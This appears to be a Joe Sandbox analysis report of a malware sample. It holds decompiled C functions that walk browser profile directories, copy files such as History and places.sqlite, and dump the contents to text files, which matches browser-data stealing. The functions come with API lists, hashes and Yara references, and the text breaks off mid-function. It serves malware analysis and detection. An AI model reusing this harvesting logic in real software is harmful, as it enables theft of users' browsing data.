                                                                                                    • API String ID: 1974802433-2232271174
                                                                                                    • Opcode ID: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
                                                                                                    • Instruction ID: 31102d54a49b3a600332046a535115537665bbef1f46384b784085fa532e6d73
                                                                                                    • Opcode Fuzzy Hash: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
                                                                                                    • Instruction Fuzzy Hash: 61516C70909259AFCB12EB61CC45BDDBB78EF45304F2041EBA508F7192DA789F898B19
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00412D9C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 141fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 45%
                                                                                                    			E00412D9C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				intOrPtr _v656;
				char _v660;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t124;
				intOrPtr _t129;
				intOrPtr _t141;
				intOrPtr _t142;

				_t139 = __esi;
				_t138 = __edi;
				_t107 = __ebx;
				_t141 = _t142;
				_push(__ecx);
				_t109 = 0x51;
				do {
					_push(0);
					_push(0);
					_t109 = _t109 - 1;
				} while (_t109 != 0);
				_push(_t109);
				_t1 =  &_v8;
				 *_t1 = _t109;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t141);
				_push(0x412fe0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t142;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x413008);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x413008);
					E0040813C(0x61,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t107, 0x104) != 0) {
						_push(_t141);
						_push(0x412f54);
						_push( *[fs:eax]);
						 *[fs:eax] = _t142;
						if(_a4 == 0) {
							_push(_v8);
							_push(0x413008);
							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
							_push(_v648);
							_push(L"\\History");
							E00403E1C();
							E004129A4(_v644, _t107,  &_v640, _t138, _t139);
							E0040377C( &_v636, _v640);
							_push(_v636);
							_push(_v16);
							_push(0x413008);
							_push(_v12);
							_push(0x413028);
							E00403D10( &_v660, 0x104,  &(_v616.cFileName));
							_push(_v660);
							_push(L".txt");
							E00403E1C();
							E0040377C( &_v652, _v656);
							_pop(_t105);
							E0040DCE8(_t105, _t107, _v652, _t138, _t139);
						}
						_pop(_t129);
						 *[fs:eax] = _t129;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t124);
				 *[fs:eax] = _t124;
				_push(E00412FE7);
				E00403B98( &_v660, 2);
				E004034E4( &_v652);
				E00403B98( &_v648, 3);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}

























                                                                                                    0x00412d9c
                                                                                                    0x00412d9c
                                                                                                    0x00412d9c
                                                                                                    0x00412d9d
                                                                                                    0x00412d9f
                                                                                                    0x00412da0
                                                                                                    0x00412da5
                                                                                                    0x00412da5
                                                                                                    0x00412da7
                                                                                                    0x00412da9
                                                                                                    0x00412da9
                                                                                                    0x00412dac
                                                                                                    0x00412dad
                                                                                                    0x00412dad
                                                                                                    0x00412db0
                                                                                                    0x00412db1
                                                                                                    0x00412db2
                                                                                                    0x00412db3
                                                                                                    0x00412db6
                                                                                                    0x00412db9
                                                                                                    0x00412dbf
                                                                                                    0x00412dc7
                                                                                                    0x00412dcf
                                                                                                    0x00412dd6
                                                                                                    0x00412dd7
                                                                                                    0x00412ddc
                                                                                                    0x00412ddf
                                                                                                    0x00412df7
                                                                                                    0x00412e0d
                                                                                                    0x00412e10
                                                                                                    0x00412e10
                                                                                                    0x00412e13
                                                                                                    0x00412e29
                                                                                                    0x00412e2e
                                                                                                    0x00412e34
                                                                                                    0x00412e44
                                                                                                    0x00412e49
                                                                                                    0x00412e5a
                                                                                                    0x00412e6c
                                                                                                    0x00412e74
                                                                                                    0x00412e75
                                                                                                    0x00412e7a
                                                                                                    0x00412e7d
                                                                                                    0x00412e84
                                                                                                    0x00412e8a
                                                                                                    0x00412e8d
                                                                                                    0x00412ea3
                                                                                                    0x00412ea8
                                                                                                    0x00412eae
                                                                                                    0x00412ebe
                                                                                                    0x00412ecf
                                                                                                    0x00412ee0
                                                                                                    0x00412eeb
                                                                                                    0x00412eec
                                                                                                    0x00412eef
                                                                                                    0x00412ef4
                                                                                                    0x00412ef7
                                                                                                    0x00412f0d
                                                                                                    0x00412f12
                                                                                                    0x00412f18
                                                                                                    0x00412f28
                                                                                                    0x00412f39
                                                                                                    0x00412f44
                                                                                                    0x00412f45
                                                                                                    0x00412f45
                                                                                                    0x00412f4c
                                                                                                    0x00412f4f
                                                                                                    0x00412f4f
                                                                                                    0x00412f6e
                                                                                                    0x00412f7a
                                                                                                    0x00412f81
                                                                                                    0x00412f84
                                                                                                    0x00412f87
                                                                                                    0x00412f97
                                                                                                    0x00412fa2
                                                                                                    0x00412fb2
                                                                                                    0x00412fbd
                                                                                                    0x00412fcd
                                                                                                    0x00412fdf

                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst
                                                                                                    • String ID: .txt$\*.*$\History
                                                                                                    • API String ID: 1974802433-2232271174
                                                                                                    • Opcode ID: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
                                                                                                    • Instruction ID: 28420ec06a4cf3b7f255eec712baa8d4c4073a44f08a77f37e2c3042b4162f15
                                                                                                    • Opcode Fuzzy Hash: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
                                                                                                    • Instruction Fuzzy Hash: 7C515D74904219ABDF10EF51CD45BCDBBB9EF48304F6041FAA508B2291DA789F958F18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041303C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 139fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 44%
                                                                                                    			E0041303C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				intOrPtr _v656;
				char _v660;
				void* _t103;
				intOrPtr _t108;
				intOrPtr _t123;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t141;

				_t138 = __esi;
				_t137 = __edi;
				_t106 = __ebx;
				_t140 = _t141;
				_push(__ecx);
				_t108 = 0x51;
				do {
					_push(0);
					_push(0);
					_t108 = _t108 - 1;
				} while (_t108 != 0);
				_push(_t108);
				_t1 =  &_v8;
				 *_t1 = _t108;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t140);
				_push(0x413276);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x4132a0);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x4132a0);
					E0040813C(0x1f,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t106, 0x104) != 0) {
						_push(_t140);
						_push(0x4131ea);
						_push( *[fs:eax]);
						 *[fs:eax] = _t141;
						_push(_v8);
						_push(0x4132a0);
						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
						_push(_v648);
						_push(L"\\places.sqlite");
						E00403E1C();
						E0041256C(_v644, _t106,  &_v640, _t137, _t138);
						E0040377C( &_v636, _v640);
						_push(_v636);
						_push(_v16);
						_push(0x4132a0);
						_push(_v12);
						_push(E004132CC);
						E00403D10( &_v660, 0x104,  &(_v616.cFileName));
						_push(_v660);
						_push(L".txt");
						E00403E1C();
						E0040377C( &_v652, _v656);
						_pop(_t103);
						E0040DCE8(_t103, _t106, _v652, _t137, _t138);
						_pop(_t136);
						 *[fs:eax] = _t136;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t123);
				 *[fs:eax] = _t123;
				_push(E0041327D);
				E00403B98( &_v660, 2);
				E004034E4( &_v652);
				E00403B98( &_v648, 3);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}

























                                                                                                    0x0041303c
                                                                                                    0x0041303c
                                                                                                    0x0041303c
                                                                                                    0x0041303d
                                                                                                    0x0041303f
                                                                                                    0x00413040
                                                                                                    0x00413045
                                                                                                    0x00413045
                                                                                                    0x00413047
                                                                                                    0x00413049
                                                                                                    0x00413049
                                                                                                    0x0041304c
                                                                                                    0x0041304d
                                                                                                    0x0041304d
                                                                                                    0x00413050
                                                                                                    0x00413051
                                                                                                    0x00413052
                                                                                                    0x00413053
                                                                                                    0x00413056
                                                                                                    0x00413059
                                                                                                    0x0041305f
                                                                                                    0x00413067
                                                                                                    0x0041306f
                                                                                                    0x00413076
                                                                                                    0x00413077
                                                                                                    0x0041307c
                                                                                                    0x0041307f
                                                                                                    0x00413097
                                                                                                    0x004130ad
                                                                                                    0x004130b0
                                                                                                    0x004130b0
                                                                                                    0x004130b3
                                                                                                    0x004130c9
                                                                                                    0x004130ce
                                                                                                    0x004130d4
                                                                                                    0x004130e4
                                                                                                    0x004130e9
                                                                                                    0x004130fa
                                                                                                    0x0041310c
                                                                                                    0x00413114
                                                                                                    0x00413115
                                                                                                    0x0041311a
                                                                                                    0x0041311d
                                                                                                    0x00413120
                                                                                                    0x00413123
                                                                                                    0x00413139
                                                                                                    0x0041313e
                                                                                                    0x00413144
                                                                                                    0x00413154
                                                                                                    0x00413165
                                                                                                    0x00413176
                                                                                                    0x00413181
                                                                                                    0x00413182
                                                                                                    0x00413185
                                                                                                    0x0041318a
                                                                                                    0x0041318d
                                                                                                    0x004131a3
                                                                                                    0x004131a8
                                                                                                    0x004131ae
                                                                                                    0x004131be
                                                                                                    0x004131cf
                                                                                                    0x004131da
                                                                                                    0x004131db
                                                                                                    0x004131e2
                                                                                                    0x004131e5
                                                                                                    0x004131e5
                                                                                                    0x00413204
                                                                                                    0x00413210
                                                                                                    0x00413217
                                                                                                    0x0041321a
                                                                                                    0x0041321d
                                                                                                    0x0041322d
                                                                                                    0x00413238
                                                                                                    0x00413248
                                                                                                    0x00413253
                                                                                                    0x00413263
                                                                                                    0x00413275

                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00413276,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,00413E3A,00000000,00000000), ref: 004130A8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst
                                                                                                    • String ID: .txt$\*.*$\places.sqlite
                                                                                                    • API String ID: 1974802433-3919338718
                                                                                                    • Opcode ID: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
                                                                                                    • Instruction ID: 8aac54383f65123cc0eb0a4bac2364391818e056087fcce0e0ee32974804bc60
                                                                                                    • Opcode Fuzzy Hash: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
                                                                                                    • Instruction Fuzzy Hash: CB513A74904119ABDF10EF61CC45BCDBBB9EF44305F6081FAA508B3291DA39AF858F18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004111C4 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 201fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 42%
                                                                                                    			E004111C4(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				char _v668;
				char _v672;
				char _v676;
				char _v680;
				char _v684;
				char _v688;
				intOrPtr _v692;
				char _v696;
				void* _t143;
				void* _t160;
				intOrPtr _t164;
				intOrPtr _t181;
				intOrPtr _t188;
				intOrPtr _t210;
				intOrPtr _t211;

				_t208 = __esi;
				_t207 = __edi;
				_t162 = __ebx;
				_t210 = _t211;
				_push(__ecx);
				_t164 = 0x56;
				do {
					_push(0);
					_push(0);
					_t164 = _t164 - 1;
				} while (_t164 != 0);
				_t1 =  &_v8;
				 *_t1 = _t164;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t210);
				_push(0x411542);
				_push( *[fs:eax]);
				 *[fs:eax] = _t211;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x41156c);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x41156c);
					E0040813C(0x61,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t162, 0x104) != 0) {
						_push(_t210);
						_push(0x411480);
						_push( *[fs:eax]);
						 *[fs:eax] = _t211;
						if(_a4 == 0) {
							_push(_v8);
							_push(0x41156c);
							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
							_push(_v648);
							_push(0x41156c);
							E0040813C(0x61,  &_v652);
							_push(_v652);
							E00403E1C();
							E00410BB8(_v644, _t162,  &_v640, _t207, _t208);
							E0040377C( &_v636, _v640);
							_push(_v636);
							_push(_v16);
							_push(0x41156c);
							_push(_v12);
							_push(E00411574);
							E00403D10( &_v664, 0x104,  &(_v616.cFileName));
							_push(_v664);
							_push(L".txt");
							E00403E1C();
							E0040377C( &_v656, _v660);
							_pop(_t160);
							E0040DCE8(_t160, _t162, _v656, _t207, _t208);
						}
						if(_a4 == 0) {
							_push(_v8);
							_push(0x41156c);
							E00403D10( &_v680, 0x104,  &(_v616.cFileName));
							_push(_v680);
							_push(0x41156c);
							E0040813C(0x61,  &_v684);
							_push(_v684);
							E00403E1C();
							E00410E70(_v676, _t162,  &_v672, _t207, _t208);
							E0040377C( &_v668, _v672);
							_push(_v668);
							_push(_v16);
							_push(0x41156c);
							_push(_v12);
							_push(E00411574);
							E00403D10( &_v696, 0x104,  &(_v616.cFileName));
							_push(_v696);
							_push(E00411574);
							_push(E0041158C);
							_push(E0041158C);
							_push(L".txt");
							E00403E1C();
							E0040377C( &_v688, _v692);
							_pop(_t143);
							E0040DCE8(_t143, _t162, _v688, _t207, _t208);
						}
						_pop(_t188);
						 *[fs:eax] = _t188;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t181);
				 *[fs:eax] = _t181;
				_push(E0041154C);
				E00403B98( &_v696, 2);
				E004034E4( &_v688);
				E00403B98( &_v684, 4);
				E004034E4( &_v668);
				E00403B98( &_v664, 2);
				E004034E4( &_v656);
				E00403B98( &_v652, 4);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}



































                                                                                                    0x004111c4
                                                                                                    0x004111c4
                                                                                                    0x004111c4
                                                                                                    0x004111c5
                                                                                                    0x004111c7
                                                                                                    0x004111c8
                                                                                                    0x004111cd
                                                                                                    0x004111cd
                                                                                                    0x004111cf
                                                                                                    0x004111d1
                                                                                                    0x004111d1
                                                                                                    0x004111d4
                                                                                                    0x004111d4
                                                                                                    0x004111d7
                                                                                                    0x004111d8
                                                                                                    0x004111d9
                                                                                                    0x004111da
                                                                                                    0x004111dd
                                                                                                    0x004111e0
                                                                                                    0x004111e6
                                                                                                    0x004111ee
                                                                                                    0x004111f6
                                                                                                    0x004111fd
                                                                                                    0x004111fe
                                                                                                    0x00411203
                                                                                                    0x00411206
                                                                                                    0x0041121e
                                                                                                    0x00411234
                                                                                                    0x00411237
                                                                                                    0x00411237
                                                                                                    0x0041123a
                                                                                                    0x00411250
                                                                                                    0x00411255
                                                                                                    0x0041125b
                                                                                                    0x0041126b
                                                                                                    0x00411270
                                                                                                    0x00411281
                                                                                                    0x00411293
                                                                                                    0x0041129b
                                                                                                    0x0041129c
                                                                                                    0x004112a1
                                                                                                    0x004112a4
                                                                                                    0x004112ab
                                                                                                    0x004112b1
                                                                                                    0x004112b4
                                                                                                    0x004112ca
                                                                                                    0x004112cf
                                                                                                    0x004112d5
                                                                                                    0x004112e5
                                                                                                    0x004112ea
                                                                                                    0x004112fb
                                                                                                    0x0041130c
                                                                                                    0x0041131d
                                                                                                    0x00411328
                                                                                                    0x00411329
                                                                                                    0x0041132c
                                                                                                    0x00411331
                                                                                                    0x00411334
                                                                                                    0x0041134a
                                                                                                    0x0041134f
                                                                                                    0x00411355
                                                                                                    0x00411365
                                                                                                    0x00411376
                                                                                                    0x00411381
                                                                                                    0x00411382
                                                                                                    0x00411382
                                                                                                    0x0041138b
                                                                                                    0x00411391
                                                                                                    0x00411394
                                                                                                    0x004113aa
                                                                                                    0x004113af
                                                                                                    0x004113b5
                                                                                                    0x004113c5
                                                                                                    0x004113ca
                                                                                                    0x004113db
                                                                                                    0x004113ec
                                                                                                    0x004113fd
                                                                                                    0x00411408
                                                                                                    0x00411409
                                                                                                    0x0041140c
                                                                                                    0x00411411
                                                                                                    0x00411414
                                                                                                    0x0041142a
                                                                                                    0x0041142f
                                                                                                    0x00411435
                                                                                                    0x0041143a
                                                                                                    0x0041143f
                                                                                                    0x00411444
                                                                                                    0x00411454
                                                                                                    0x00411465
                                                                                                    0x00411470
                                                                                                    0x00411471
                                                                                                    0x00411471
                                                                                                    0x00411478
                                                                                                    0x0041147b
                                                                                                    0x0041147b
                                                                                                    0x0041149a
                                                                                                    0x004114a6
                                                                                                    0x004114ad
                                                                                                    0x004114b0
                                                                                                    0x004114b3
                                                                                                    0x004114c3
                                                                                                    0x004114ce
                                                                                                    0x004114de
                                                                                                    0x004114e9
                                                                                                    0x004114f9
                                                                                                    0x00411504
                                                                                                    0x00411514
                                                                                                    0x0041151f
                                                                                                    0x0041152f
                                                                                                    0x00411541

                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,004118A0,00000000,00000000,00412524), ref: 0041122F
                                                                                                      • Part of subcall function 00410E70: GetTickCount.KERNEL32(00000000,004110CE,?,00000000,00411163,?,00000000,0041B0FC,00000000,00000000,00000000,?,004113F1,?,0041156C,?), ref: 00410EB4
                                                                                                      • Part of subcall function 00410E70: CopyFileW.KERNEL32(00000000,00000000,000000FF), ref: 00410F30
                                                                                                    • FindNextFileW.KERNEL32(?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000), ref: 00411495
                                                                                                    • FindClose.KERNEL32(?,?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000), ref: 004114A6
                                                                                                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$CloseCopyCountFirstFreeNextStringTick
                                                                                                    • String ID: .txt$\*.*
                                                                                                    • API String ID: 4269597168-2615687548
                                                                                                    • Opcode ID: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
                                                                                                    • Instruction ID: 6859e3562032d776fa84e591ecfbf3afacee5e694faebf3c1d1cda20f45b7b98
                                                                                                    • Opcode Fuzzy Hash: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
                                                                                                    • Instruction Fuzzy Hash: 6C810C7490021DABDF10EB51CC85BCDB77AEF84304F6041E6A608B62A2DB799F858F58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041158C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 46%
                                                                                                    			E0041158C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				intOrPtr _v117;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				void* _t109;
				void* _t113;
				intOrPtr _t115;
				intOrPtr _t130;
				intOrPtr _t144;
				intOrPtr _t148;
				intOrPtr _t149;

				_t146 = __esi;
				_t145 = __edi;
				_t113 = __ebx + 1;
				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
				_v117 = _v117 + __edx;
				_t148 = _t149;
				_push(__ecx);
				_t115 = 0x52;
				do {
					_push(0);
					_push(0);
					_t115 = _t115 - 1;
				} while (_t115 != 0);
				_t3 =  &_v8;
				 *_t3 = _t115;
				_push(_t113);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t3;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t148);
				_push(0x4117df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t149;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x411808);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x411808);
					E0040813C(0x1f,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t113, 0x104) != 0) {
						_push(_t148);
						_push(0x411753);
						_push( *[fs:eax]);
						 *[fs:eax] = _t149;
						_push(_v8);
						_push(0x411808);
						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
						_push(_v648);
						_push(0x411808);
						E0040813C(0x1f,  &_v652);
						_push(_v652);
						E00403E1C();
						E00410900(_v644, _t113,  &_v640, _t145, _t146);
						E0040377C( &_v636, _v640);
						_push(_v636);
						_push(_v16);
						_push(0x411808);
						_push(_v12);
						_push(E00411810);
						E00403D10( &_v664, 0x104,  &(_v616.cFileName));
						_push(_v664);
						_push(L".txt");
						E00403E1C();
						E0040377C( &_v656, _v660);
						_pop(_t109);
						E0040DCE8(_t109, _t113, _v656, _t145, _t146);
						_pop(_t144);
						 *[fs:eax] = _t144;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t130);
				 *[fs:eax] = _t130;
				_push(E004117E6);
				E00403B98( &_v664, 2);
				E004034E4( &_v656);
				E00403B98( &_v652, 4);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}




























                                                                                                    0x0041158c
                                                                                                    0x0041158c
                                                                                                    0x0041158c
                                                                                                    0x0041158d
                                                                                                    0x0041158f
                                                                                                    0x00411591
                                                                                                    0x00411593
                                                                                                    0x00411594
                                                                                                    0x00411599
                                                                                                    0x00411599
                                                                                                    0x0041159b
                                                                                                    0x0041159d
                                                                                                    0x0041159d
                                                                                                    0x004115a0
                                                                                                    0x004115a0
                                                                                                    0x004115a3
                                                                                                    0x004115a4
                                                                                                    0x004115a5
                                                                                                    0x004115a6
                                                                                                    0x004115a9
                                                                                                    0x004115ac
                                                                                                    0x004115b2
                                                                                                    0x004115ba
                                                                                                    0x004115c2
                                                                                                    0x004115c9
                                                                                                    0x004115ca
                                                                                                    0x004115cf
                                                                                                    0x004115d2
                                                                                                    0x004115ea
                                                                                                    0x00411600
                                                                                                    0x00411603
                                                                                                    0x00411603
                                                                                                    0x00411606
                                                                                                    0x0041161c
                                                                                                    0x00411621
                                                                                                    0x00411627
                                                                                                    0x00411637
                                                                                                    0x0041163c
                                                                                                    0x0041164d
                                                                                                    0x0041165f
                                                                                                    0x00411667
                                                                                                    0x00411668
                                                                                                    0x0041166d
                                                                                                    0x00411670
                                                                                                    0x00411673
                                                                                                    0x00411676
                                                                                                    0x0041168c
                                                                                                    0x00411691
                                                                                                    0x00411697
                                                                                                    0x004116a7
                                                                                                    0x004116ac
                                                                                                    0x004116bd
                                                                                                    0x004116ce
                                                                                                    0x004116df
                                                                                                    0x004116ea
                                                                                                    0x004116eb
                                                                                                    0x004116ee
                                                                                                    0x004116f3
                                                                                                    0x004116f6
                                                                                                    0x0041170c
                                                                                                    0x00411711
                                                                                                    0x00411717
                                                                                                    0x00411727
                                                                                                    0x00411738
                                                                                                    0x00411743
                                                                                                    0x00411744
                                                                                                    0x0041174b
                                                                                                    0x0041174e
                                                                                                    0x0041174e
                                                                                                    0x0041176d
                                                                                                    0x00411779
                                                                                                    0x00411780
                                                                                                    0x00411783
                                                                                                    0x00411786
                                                                                                    0x00411796
                                                                                                    0x004117a1
                                                                                                    0x004117b1
                                                                                                    0x004117bc
                                                                                                    0x004117cc
                                                                                                    0x004117de

                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
                                                                                                    • FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779
                                                                                                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseFirstFreeNextString
                                                                                                    • String ID: .txt$\*.*
                                                                                                    • API String ID: 2008072091-2615687548
                                                                                                    • Opcode ID: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
                                                                                                    • Instruction ID: cb1fa36ef6bd00d28df09069f3f2ad3b15c2d413a197645ac6dab8893c9dac73
                                                                                                    • Opcode Fuzzy Hash: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
                                                                                                    • Instruction Fuzzy Hash: 1D514C7490411DABDF10EB61CC45BDDB779EF45304F2085FAA608B22A2DA389F858F18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411590 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 45%
                                                                                                    			E00411590(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				void* _t107;
				intOrPtr _t112;
				intOrPtr _t127;
				intOrPtr _t141;
				intOrPtr _t145;
				intOrPtr _t146;

				_t143 = __esi;
				_t142 = __edi;
				_t110 = __ebx;
				_t145 = _t146;
				_push(__ecx);
				_t112 = 0x52;
				do {
					_push(0);
					_push(0);
					_t112 = _t112 - 1;
				} while (_t112 != 0);
				_t1 =  &_v8;
